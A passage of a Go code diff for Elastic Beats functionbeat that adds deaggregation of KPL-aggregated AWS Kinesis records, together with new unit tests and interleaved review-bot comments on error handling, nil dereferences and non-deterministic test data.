+ Data: aggRecBytes,
+ PartitionKey: "abc123",
+ SequenceNumber: "12345",
+ KinesisSchemaVersion: "v1",
+ },
+ },
+ },
+ }
+}
+
 func testKinesisConfig(t *testing.T) {
 tests := map[string]struct {
 valid bool
diff --git a/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go b/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go
index bc38ed2ab2df..b77dafcc24e4 100644
--- a/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go
+++ b/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go
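Review bot: `data, _ := proto.Marshal(aggRec)` in `generateAggregatedKinesisEvent` discards the marshal error, so a failed encoding would yield a magic header plus an MD5 over empty data and the test would fail at deaggregation instead of at the real cause; the helper already panics on the `strconv.Unquote` error, so be consistent with `data, err := proto.Marshal(aggRec)` followed by `if err != nil { panic(err) }`. The same discarded error is in `generateKinesisAggregateRecord` in transformer_test.go, which is otherwise a near copy of this helper with a record loop, so one shared helper taking `numRecords` would cover both. In the two new subtests earlier in this file, `c, _ := k.(*Kinesis)` ignores the assertion result; checking the ok value gives a clear failure message instead of a nil-pointer panic if `NewKinesis` ever returns another type.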
@@ -13,6 +13,8 @@ import (
 "time"
 "github.com/aws/aws-lambda-go/events"
+ "github.com/aws/aws-sdk-go/service/kinesis"
+ "github.com/awslabs/kinesis-aggregation/go/deaggregator"
 "github.com/elastic/beats/v7/libbeat/beat"
 "github.com/elastic/beats/v7/libbeat/common"
@@ -83,34 +85,48 @@ func APIGatewayProxyRequest(request events.APIGatewayProxyRequest) beat.Event {
 // KinesisEvent takes a kinesis event and create multiples beat events.
 // DOCS: https://docs.aws.amazon.com/lambda/latest/dg/with-kinesis.html
-func KinesisEvent(request events.KinesisEvent) []beat.Event {
- events := make([]beat.Event, len(request.Records))
- for idx, record := range request.Records {
- events[idx] = beat.Event{
- Timestamp: time.Now(),
- Fields: common.MapStr{
- "event": common.MapStr{
- "kind": "event",
- },
- "cloud": common.MapStr{
- "provider": "aws",
- "region": record.AwsRegion,
+func KinesisEvent(request events.KinesisEvent) ([]beat.Event, error) {
+ var events []beat.Event
+ for _, record := range request.Records {
+ kr := &kinesis.Record{
+ ApproximateArrivalTimestamp: &record.Kinesis.ApproximateArrivalTimestamp.Time,
+ Data: record.Kinesis.Data,
+ EncryptionType: &record.Kinesis.EncryptionType,
+ PartitionKey: &record.Kinesis.PartitionKey,
+ SequenceNumber: &record.Kinesis.SequenceNumber,
+ }
+ deaggRecords, err := deaggregator.DeaggregateRecords([]*kinesis.Record{kr})
+ if err != nil {
+ return nil, err
+ }
+
+ for _, deaggRecord := range deaggRecords {
+ events = append(events, beat.Event{
+ Timestamp: time.Now(),
+ Fields: common.MapStr{
+ "event": common.MapStr{
+ "kind": "event",
+ },
+ "cloud": common.MapStr{
+ "provider": "aws",
+ "region": record.AwsRegion,
+ },
+ "event_id": record.EventID,
+ "event_name": record.EventName,
+ "event_source": record.EventSource,
+ "event_source_arn": record.EventSourceArn,
+ "event_version": record.EventVersion,
+ "aws_region": record.AwsRegion,
+ "message": string(deaggRecord.Data),
+ "kinesis_partition_key": *deaggRecord.PartitionKey,
+ "kinesis_schema_version": record.Kinesis.KinesisSchemaVersion,
+ "kinesis_sequence_number": *deaggRecord.SequenceNumber,
+ "kinesis_encryption_type": *deaggRecord.EncryptionType,
 },
- "event_id": record.EventID,
- "event_name": record.EventName,
- "event_source": record.EventSource,
- "event_source_arn": record.EventSourceArn,
- "event_version": record.EventVersion,
- "aws_region": record.AwsRegion,
- "message": string(record.Kinesis.Data),
- "kinesis_partition_key": record.Kinesis.PartitionKey,
- "kinesis_schema_version": record.Kinesis.KinesisSchemaVersion,
- "kinesis_sequence_number": record.Kinesis.SequenceNumber,
- "kinesis_encryption_type": record.Kinesis.EncryptionType,
- },
+ })
 }
 }
- return events
+ return events, nil
 }
 // CloudwatchKinesisEvent takes a Kinesis event containing Cloudwatch logs and creates events for all
diff --git a/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go b/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go
index 44657582a01a..373c7981c78c 100644
--- a/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go
+++ b/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go
@@ -5,10 +5,18 @@ package transformer
 import (
+ "crypto/md5"
+ "encoding/base64"
+ "fmt"
+ "math/rand"
+ "strconv"
 "testing"
 "time"
 "github.com/aws/aws-lambda-go/events"
+ "github.com/awslabs/kinesis-aggregation/go/deaggregator"
+ aggRecProto "github.com/awslabs/kinesis-aggregation/go/records"
+ "github.com/golang/protobuf/proto"
 "github.com/stretchr/testify/assert"
 "github.com/elastic/beats/v7/libbeat/beat"
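Review bot: The doc comment above `KinesisEvent` still describes the old single-return behaviour and says nothing about deaggregation or the new error; suggest `// KinesisEvent takes a Kinesis event, deaggregates any KPL-aggregated records it contains and creates one beat event per resulting record. It returns an error, and no events, if a record cannot be deaggregated.` Inside the inner loop, `*deaggRecord.PartitionKey`, `*deaggRecord.SequenceNumber` and `*deaggRecord.EncryptionType` dereference pointers filled in by the deaggregator; if it leaves any of them nil for a sub-record (its contract is not visible in this hunk), the handler panics on data read from the stream, so a nil-safe read such as `aws.StringValue(deaggRecord.PartitionKey)` from the already-required `github.com/aws/aws-sdk-go/aws` package would yield an empty field instead. `return nil, err` also drops which record failed; wrapping it with `record.EventID` or the sequence number would make the batch failure diagnosable from the log. Note that `var events []beat.Event` changes the empty-input result from an empty slice to nil, which matters only if a caller or JSON consumer distinguishes the two.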
@@ -61,51 +69,204 @@ func TestCloudwatch(t *testing.T) {
 }
 func TestKinesis(t *testing.T) {
- request := events.KinesisEvent{
- Records: []events.KinesisEventRecord{
- events.KinesisEventRecord{
- AwsRegion: "us-east-1",
- EventID: "1234",
- EventName: "connect",
- EventSource: "web",
- EventVersion: "1.0",
- EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
- Kinesis: events.KinesisRecord{
- Data: []byte("hello world"),
- PartitionKey: "abc123",
- SequenceNumber: "12345",
- KinesisSchemaVersion: "1.0",
- EncryptionType: "test",
+ t.Run("when kinesis event is successful", func(t *testing.T) {
+ request := events.KinesisEvent{
+ Records: []events.KinesisEventRecord{
+ events.KinesisEventRecord{
+ AwsRegion: "us-east-1",
+ EventID: "1234",
+ EventName: "connect",
+ EventSource: "web",
+ EventVersion: "1.0",
+ EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+ Kinesis: events.KinesisRecord{
+ Data: []byte("hello world"),
+ PartitionKey: "abc123",
+ SequenceNumber: "12345",
+ KinesisSchemaVersion: "1.0",
+ EncryptionType: "test",
+ },
 },
 },
- },
- }
+ }
- events := KinesisEvent(request)
- assert.Equal(t, 1, len(events))
+ events, err := KinesisEvent(request)
+ assert.NoError(t, err)
+ assert.Equal(t, 1, len(events))
- fields := common.MapStr{
- "cloud": common.MapStr{
- "provider": "aws",
- "region": "us-east-1",
- },
- "event": common.MapStr{
- "kind": "event",
- },
- "event_id": "1234",
- "event_name": "connect",
- "event_source": "web",
- "event_source_arn": "arn:aws:iam::00000000:role/functionbeat",
- "event_version": "1.0",
- "aws_region": "us-east-1",
- "message": "hello world",
- "kinesis_partition_key": "abc123",
- "kinesis_schema_version": "1.0",
- "kinesis_sequence_number": "12345",
- "kinesis_encryption_type": "test",
- }
+ fields := common.MapStr{
+ "cloud": common.MapStr{
+ "provider": "aws",
+ "region": "us-east-1",
+ },
+ "event": common.MapStr{
+ "kind": "event",
+ },
+ "event_id": "1234",
+ "event_name": "connect",
+ "event_source": "web",
+ "event_source_arn": "arn:aws:iam::00000000:role/functionbeat",
+ "event_version": "1.0",
+ "aws_region": "us-east-1",
+ "message": "hello world",
+ "kinesis_partition_key": "abc123",
+ "kinesis_schema_version": "1.0",
+ "kinesis_sequence_number": "12345",
+ "kinesis_encryption_type": "test",
+ }
+
+ assert.Equal(t, fields, events[0].Fields)
+ })
+
+ t.Run("when kinesis event with agg is successful", func(t *testing.T) {
+ rand.Seed(time.Now().UnixNano())
+ min, max := 2, 20
+ numRecords := rand.Intn(max-min) + min
+ aggRecBytes := generateKinesisAggregateRecord(numRecords, true)
+
+ request := events.KinesisEvent{
+ Records: []events.KinesisEventRecord{
+ events.KinesisEventRecord{
+ AwsRegion: "us-east-1",
+ EventID: "1234",
+ EventName: "connect",
+ EventSource: "web",
+ EventVersion: "1.0",
+ EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+ Kinesis: events.KinesisRecord{
+ Data: aggRecBytes,
+ PartitionKey: "ignored",
+ SequenceNumber: "12345",
+ KinesisSchemaVersion: "1.0",
+ EncryptionType: "test",
+ },
+ },
+ },
+ }
+
+ events, err := KinesisEvent(request)
+ assert.NoError(t, err)
+ assert.Equal(t, numRecords, len(events))
+
+ envelopeFields := common.MapStr{
+ "cloud": common.MapStr{
+ "provider": "aws",
+ "region": "us-east-1",
+ },
+ "event": common.MapStr{
+ "kind": "event",
+ },
+ "event_id": "1234",
+ "event_name": "connect",
+ "event_source": "web",
+ "event_source_arn": "arn:aws:iam::00000000:role/functionbeat",
+ "event_version": "1.0",
+ "aws_region": "us-east-1",
+ "kinesis_schema_version": "1.0",
+ "kinesis_sequence_number": "12345",
+ "kinesis_encryption_type": "test",
+ }
+
+ var expectedInnerFields []common.MapStr
+ for i := 0; i < numRecords; i++ {
+ expectedInnerFields = append(expectedInnerFields, common.MapStr{
+ "message": fmt.Sprintf("%s %d", "hello world", i),
+ "kinesis_partition_key": fmt.Sprintf("%s %d", "partKey", i),
+ })
+ }
+
+ for i, expectedFields := range expectedInnerFields {
+ expectedFields.Update(envelopeFields)
+ assert.Equal(t, expectedFields, events[i].Fields)
+ }
+ })
+
+ t.Run("when kinesis event with agg is not successful", func(t *testing.T) {
+ aggRecBytes := generateKinesisAggregateRecord(2, false)
+
+ request := events.KinesisEvent{
+ Records: []events.KinesisEventRecord{
+ events.KinesisEventRecord{
+ AwsRegion: "us-east-1",
+ EventID: "1234",
+ EventName: "connect",
+ EventSource: "web",
+ EventVersion: "1.0",
+ EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+ Kinesis: events.KinesisRecord{
+ Data: aggRecBytes,
+ PartitionKey: "abc123",
+ SequenceNumber: "12345",
+ KinesisSchemaVersion: "1.0",
+ EncryptionType: "test",
+ },
+ },
+ },
+ }
- assert.Equal(t, fields, events[0].Fields)
+ events, err := KinesisEvent(request)
+ assert.Error(t, err)
+ assert.Nil(t, events)
+ })
+
+ t.Run("when kinesis event with real example agg payload is successful", func(t *testing.T) {
+ rand.Seed(time.Now().UnixNano())
+ numRecords := 10
+ aggRecBytes, err := base64.StdEncoding.DecodeString("84mawgoIejJKSjl6dFgaEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg9" +
+ "7ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn" +
+ "0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6I" +
+ "nZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn3xj2DFMGZ0aNQC7aexsnkU")
+ assert.NoError(t, err)
+
+ request := events.KinesisEvent{
+ Records: []events.KinesisEventRecord{
+ events.KinesisEventRecord{
+ AwsRegion: "us-east-1",
+ EventID: "1234",
+ EventName: "connect",
+ EventSource: "web",
+ EventVersion: "1.0",
+ EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+ Kinesis: events.KinesisRecord{
+ Data: aggRecBytes,
+ PartitionKey: "ignored",
+ SequenceNumber: "12345",
+ KinesisSchemaVersion: "1.0",
+ EncryptionType: "test",
+ },
+ },
+ },
+ }
+
+ events, err := KinesisEvent(request)
+ assert.NoError(t, err)
+ assert.Equal(t, numRecords, len(events))
+
+ envelopeFields := common.MapStr{
+ "cloud": common.MapStr{
+ "provider": "aws",
+ "region": "us-east-1",
+ },
+ "event": common.MapStr{
+ "kind": "event",
+ },
+ "event_id": "1234",
+ "event_name": "connect",
+ "event_source": "web",
+ "event_source_arn": "arn:aws:iam::00000000:role/functionbeat",
+ "event_version": "1.0",
+ "aws_region": "us-east-1",
+ "kinesis_schema_version": "1.0",
+ "kinesis_sequence_number": "12345",
+ "kinesis_encryption_type": "test",
+ "kinesis_partition_key": "z2JJ9ztX",
+ "message": `{"key":"value"}`,
+ }
+
+ for i := 0; i < numRecords; i++ {
+ assert.Equal(t, envelopeFields, events[i].Fields)
+ }
+ })
 }
 func TestCloudwatchKinesis(t *testing.T) {
@@ -203,3 +364,37 @@ ciJ9XX0=`),
 assert.Equal(t, expectedFields, events[i].Fields)
 }
 }
+
+func generateKinesisAggregateRecord(numRecords int, valid bool) []byte {
+ // Heavily based on https://github.com/awslabs/kinesis-aggregation/blob/master/go/deaggregator/deaggregator_test.go
+ aggRec := &aggRecProto.AggregatedRecord{}
+ unquotedHeader, err := strconv.Unquote(deaggregator.KplMagicHeader)
+ if err != nil {
+ panic(err)
+ }
+ aggRecBytes := []byte(unquotedHeader)
+ partKeyTable := make([]string, 0)
+ for i := 0; i < numRecords; i++ {
+ partKey := uint64(i)
+ hashKey := uint64(i)
+ r := &aggRecProto.Record{
+ ExplicitHashKeyIndex: &hashKey,
+ Data: []byte(fmt.Sprintf("%s %d", "hello world", i)),
+ Tags: make([]*aggRecProto.Tag, 0),
+ }
+ // This seems to be the only way to trigger the deaggregation module to return an error when needed
+ if valid {
+ r.PartitionKeyIndex = &partKey
+ }
+ aggRec.Records = append(aggRec.Records, r)
+ partKeyTable = append(partKeyTable, fmt.Sprintf("%s %d", "partKey", i))
+ }
+
+ aggRec.PartitionKeyTable = partKeyTable
+ data, _ := proto.Marshal(aggRec)
+ md5Hash := md5.Sum(data)
+ aggRecBytes = append(aggRecBytes, data...)
+ aggRecBytes = append(aggRecBytes, md5Hash[:]...)
+
+ return aggRecBytes
+}
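Review bot: `numRecords := rand.Intn(max-min) + min` after `rand.Seed(time.Now().UnixNano())` makes the "with agg is successful" subtest non-deterministic, so a failure seen once in CI cannot be reproduced by rerunning, and the locals `min`, `max` shadow the Go 1.21 builtins. A fixed count such as `numRecords := 7`, or a small table covering 1, 2 and 20 records, exercises the same code reproducibly. The `rand.Seed` call at the top of the "real example agg payload" subtest has no effect there, since that subtest uses no randomness, and can be dropped. The enclosing `TestKinesis` function is cut at the end of the hunk.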